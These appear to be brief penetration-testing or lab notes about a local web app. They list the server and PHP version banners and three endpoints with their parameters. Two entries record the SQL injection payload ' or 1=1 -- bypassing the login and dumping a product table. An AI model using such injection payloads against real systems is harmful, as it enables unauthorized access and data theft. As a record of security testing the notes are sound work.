Server: Apache/2.4.37 (centos)
X-Powered-By: PHP/7.2.24

http://localhost: /login.php username,password POST ' or 1=1 -- logs in
http://localhost: /docontact.php description,email POST
http://localhost: /products/search.php product GET ' or 1=1 -- dumps table